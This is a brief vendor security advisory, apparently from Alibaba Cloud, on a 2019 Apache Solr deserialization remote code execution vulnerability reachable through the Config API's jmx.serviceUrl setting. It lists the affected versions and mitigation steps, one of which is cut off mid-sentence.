On March 7, 2019, Alibaba Cloud Security emergency response center detected a Solr security bulletin issued by Apache. Attackers can call the Config API and modify the jmx.serviceUrl attribute to point to a malicious RMI service, which causes a deserialization remote code execution (RCE) vulnerability in Apache Solr.
Deserialization RCE vulnerability in Apache Solr
- Apache Solr 5.00 to 5.5.5
- Apache Solr 6.00 to v6.6.5
- Upgrade your Apache Solr to 7.0 or later.
- Disable the Config API by configuring
- Ensure that only trusted traffic is allowed to access the Solr server at the network layer.
If you do not want to upgrade Solr to resolve this vulnerability, we recommend that you use the custom protection policy feature provided by WAF to protect your business.